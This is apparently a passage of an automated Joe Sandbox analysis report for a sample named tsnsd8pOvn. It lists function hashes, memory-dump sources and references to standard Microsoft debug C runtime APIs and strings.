                                • Instruction Fuzzy Hash: E3B17AB5E002199FCB84CFE9C885ADEFBF0FF48210F64816AD919E7301E334AA558B54
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                • Instruction ID: 54a7b086507587f5ba247ea6077fb3b657646de6840ddde25c0642c2f6a58452
                                • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                • Instruction Fuzzy Hash: 9171D473A30B254B8714DEB98D94192F2F1EF84610B57C27CCE84D7B45EB31B95A96C0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                • Instruction ID: e7460cfba1ed705059aef0bc0f1eb731cc87982cfb18dbf92d9d70df4d799c4a
                                • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                • Instruction Fuzzy Hash: 898137B2A047019FC328CF19D885A6AF7E1FFD8210F15892DE99E83B41D770F8558B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                • Instruction ID: a81da03a6651a19faab2033119e86af5a70f270e37b9721c587679ade13e2549
                                • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                • Instruction Fuzzy Hash: 97710622535B7A0AEBC3DA3D885046BF7D0BE4910AB850956DCD0F3181D72EDE4E77A4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                • Instruction ID: 2e2385c7df8457d743201504e2ae72909b920fe14359eeab8daf502e906f2f94
                                • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                • Instruction Fuzzy Hash: 29814975A20B669BD754CF6AD8C085AFBF1FF08210B518A2ADCA583B40D334F566CF94
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                • Instruction ID: 46327a6ffcf01737d384b5e55774bc4eb435bba024bb7c39dace0ea7e734429b
                                • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                • Instruction Fuzzy Hash: F461A3339046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A75DC9823642C234EA11DBD0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                • Instruction ID: a49abdeeff31885ef7adf1e13a09e4cc85c31e865af0639e92621e6fe9bedf83
                                • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                • Instruction Fuzzy Hash: E3617C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                • Instruction ID: 5d7ef95346197403c2fa1e60d26013a61137f192ad06f1a01e8f1834b8985e47
                                • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                • Instruction Fuzzy Hash: 4451DD229257B945EBC3DA3D88504BEBBE0BE49106B460557DCD0B3181C72EDE4DB7E4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                                • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, Offset: 02178000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2178000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                • Instruction ID: 4cdd23c1f06e0bb37bf26fb3ad0901fd171c6f7fdf606d9b9149510f57d76385
                                • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                • Instruction Fuzzy Hash: A731697588A2459FCB15CE70D891AB5BB71EFC7224F1999ECC0858B106D336504ACB94
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                                • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                • Instruction ID: 352a18da36c28492ad9ccbbe0d65539e74c5f158f4323e103da35fb91b5cda5c
                                • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                • Instruction Fuzzy Hash: 703112306283419FD741EF69C880A4BFBE1FFD8258F11D919F9889B225D730E985CA62
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: 83096edb3c103a7745057ffcfcfcac84c965f1cb31d17871bae80da4432c24ea
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: 89110BF727108343D73A86ADD8B46B6E395EBC632972C427AD14A4B65CD322D1669600
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                • Instruction ID: 2b0f342ab9d0a276d3eccf7b5ebc062fb01e8aa9e8f2e76db9cf2f3c0cf90140
                                • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                • Instruction Fuzzy Hash: 47114F0A8492C4BDCF424A7840E56EBFFA58E3B218F4A71DAC8C44B743D01B150FE7A1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction ID: 381cae556dd3feeb35d9d5a494274e5c54357251123f432acef734e90cbfd476
                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction Fuzzy Hash: 0C1182723501009FD754DFA5DC90FA673EAFB98320B198165ED08CB315D675E941C760
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, Offset: 02178000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2178000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction ID: b1e8e240dabc08e65b3ec60d9a2c3341bca6dfd0670f22dbb7b54c912d73a97e
                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction Fuzzy Hash: 1D118EB2380100AFD754DF55DC84FA673EAEB89360B1A8169ED08CB312D776E842CB60
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                • Instruction ID: 47ba753f581fde9d96b7c037f35bfa0f67b3519018e9c849d415aec83b912b71
                                • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                • Instruction Fuzzy Hash: 20012C768206629BD701DF3EC8C045AFBF1BB082117528B26DC9083A41D334E662DBE4
                                APIs
                                • InterlockedIncrement.KERNEL32(00429CB0), ref: 00410CD3
                                • __invoke_watson_if_error.LIBCMTD ref: 00410D12
                                • OutputDebugStringA.KERNEL32(Second Chance Assertion Failed: File ), ref: 00410D1F
                                • OutputDebugStringA.KERNEL32(\<B), ref: 00410D47
                                • OutputDebugStringA.KERNEL32(, Line ), ref: 00410D52
                                • OutputDebugStringA.KERNEL32(?), ref: 00410D5F
                                • OutputDebugStringA.KERNEL32(00423C50), ref: 00410D6A
                                • _wcscat_s.LIBCMTD ref: 00410F2A
                                  • Part of subcall function 00413E80: __invalid_parameter.LIBCMTD ref: 00413EF2
                                • __invoke_watson_if_error.LIBCMTD ref: 00410F33
                                  • Part of subcall function 004050F0: __invoke_watson.LIBCMTD ref: 00405111
                                • _wcscat_s.LIBCMTD ref: 00410F62
                                  • Part of subcall function 00413E80: _memset.LIBCMT ref: 00413F5B
                                  • Part of subcall function 00413E80: __invalid_parameter.LIBCMTD ref: 00413FB7
                                • __invoke_watson_if_error.LIBCMTD ref: 00410F6B
                                • __snwprintf_s.LIBCMTD ref: 00410FC4
                                  • Part of subcall function 004103C0: __vsnprintf_s_l.LIBCMTD ref: 004103E2
                                • __invoke_watson_if_oneof.LIBCMTD ref: 00410FFD
                                • _wcscpy_s.LIBCMTD ref: 00411042
                                • __invoke_watson_if_error.LIBCMTD ref: 0041104B
                                • __cftoe.LIBCMTD ref: 004110BF
                                • __invoke_watson_if_oneof.LIBCMTD ref: 004110EE
                                • _wcscpy_s.LIBCMTD ref: 00411126
                                • __invoke_watson_if_error.LIBCMTD ref: 0041112F
                                • __itow_s.LIBCMTD ref: 00410D09
                                  • Part of subcall function 00419A80: _xtow_s@20.LIBCMTD ref: 00419AAB
                                • __strftime_l.LIBCMTD ref: 00410DC9
                                • __invoke_watson_if_oneof.LIBCMTD ref: 00410E02
                                • _wcscpy_s.LIBCMTD ref: 00410E47
                                • __invoke_watson_if_error.LIBCMTD ref: 00410E50
                                • _wcscpy_s.LIBCMTD ref: 00410EA3
                                • __invoke_watson_if_error.LIBCMTD ref: 00410EAC
                                • _wcscat_s.LIBCMTD ref: 00410EDD
                                • __invoke_watson_if_error.LIBCMTD ref: 00410EE6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invoke_watson_if_error$DebugOutputString$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__invalid_parameter$IncrementInterlocked__cftoe__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset_xtow_s@20
                                • String ID: %s(%d) : %s$(*_errno())$, Line $Second Chance Assertion Failed: File $\<B$_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$t8j$t9j$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
                                • API String ID: 3801329020-3180892602
                                • Opcode ID: 00e06ec97cc5bf946eef1aba9637344f71413a1481ad46451baa8a4372063c17
                                • Instruction ID: 8dab093551b7913e4f07fcf15f3a7df9d4b11c38fe3f60e516d6160f44732538
                                • Opcode Fuzzy Hash: 00e06ec97cc5bf946eef1aba9637344f71413a1481ad46451baa8a4372063c17
                                • Instruction Fuzzy Hash: BE029EB1A40318ABDB20DF51DC4ABDE7374AB54706F50809AF6097A2C1D7BC9B84CF99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ___check_float_string$__inc$Locale_isdigit$UpdateUpdate::~___filbuf
                                • String ID: +
                                • API String ID: 3844525517-2126386893
                                • Opcode ID: b0b20d5d5da3a28e08871efdf9ca2cea2f12cbfa3c34aa03c38a2b4266782f10
                                • Instruction ID: c3e513ff934064ad069ca01882d6a481e8747600c8f2afddf123beb01d351590
                                • Opcode Fuzzy Hash: b0b20d5d5da3a28e08871efdf9ca2cea2f12cbfa3c34aa03c38a2b4266782f10
                                • Instruction Fuzzy Hash: 8AF183B1D042199BCF14CFA9CD80AEEB775BF44308F1486AED85577382DA39AA40CF59
                                APIs
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00419F3B
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00419F71
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00419F92
                                • wcsncnt.LIBCMTD ref: 00419FC9
                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419FFA
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041A02F
                                • _wcslen.LIBCMTD ref: 0041A23F
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041A24D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide_wcslenwcsncnt
                                • String ID:
                                • API String ID: 4277434810-0
                                • Opcode ID: 2837d0ecd74c80cf4b800a9977c887b4f41e3c96d914a96e9c65320daf59efe9
                                • Instruction ID: fedb6cb86680eadae71ea56e7a6a11088f6868f67021554a700cccb79d9dce4d
                                • Opcode Fuzzy Hash: 2837d0ecd74c80cf4b800a9977c887b4f41e3c96d914a96e9c65320daf59efe9
                                • Instruction Fuzzy Hash: 1CD13A71A01108EFDB08DF98C994BEEB7B1FF44304F20815AE8126B3A1D739AE95DB55
                                APIs
                                Strings
                                • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 0040365A
                                • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 004033B9
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00403621
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040344D, 004034AB, 00403666
                                • u!h@B, xrefs: 0040343F
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00403529
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00403567
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 004035E3
                                • _CrtIsValidHeapPointer(pUserData), xrefs: 00403441
                                • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 0040349F
                                • Client hook free failure., xrefs: 0040340C
                                • tDj, xrefs: 004033EB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: BytesCheck$HeapPointerValid__free_base_memset
                                • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ$tDj$u!h@B
                                • API String ID: 25084783-3186099596
                                • Opcode ID: 64e41b3368141ecefb1525bd7caf992f21245ff53f47285b2755e4fa2554e534
                                • Instruction ID: 7991a6234599cc96b2d4e41c9a9666ff2552444b1378e4abadd2e9e30342f0eb
                                • Opcode Fuzzy Hash: 64e41b3368141ecefb1525bd7caf992f21245ff53f47285b2755e4fa2554e534
                                • Instruction Fuzzy Hash: A2917EB0B40204BBEB24DF84DD82F6A77A9AB44705F304569F604BB2C2D275EF41DA9D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __inc$__hextodec__un_inc_isxdigit
                                • String ID: 8$F
                                • API String ID: 3652663768-3144575033
                                • Opcode ID: 35de4f233658b656db0b06bbd2668477a2bda3b2010a892119c93078c10e32f8
                                • Instruction ID: 9af0186a4d15f4b0e294943ee4eeea93137f490126d794f4a51adebcc94ea67d
                                • Opcode Fuzzy Hash: 35de4f233658b656db0b06bbd2668477a2bda3b2010a892119c93078c10e32f8
                                • Instruction Fuzzy Hash: BB0282B0D052599BCF24CF64C9847EEBB71AF45308F1481EED8997B382DA395A81CF49
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                                • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 3451365851-3266125857
                                • Opcode ID: 50d74972829789f5f90c135b0cc8a8d432cd2b48722598bab90b9263e28168cd
                                • Instruction ID: 9e84b599b5647acd1f0575450b0ce3e93d46b55b7b01ba4b9b02784904280f37
                                • Opcode Fuzzy Hash: 50d74972829789f5f90c135b0cc8a8d432cd2b48722598bab90b9263e28168cd
                                • Instruction Fuzzy Hash: 6DF129B1D052299FEB24DF58CC89BEEB7B5BB44304F14819AE409A7281D7389EC0CF59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
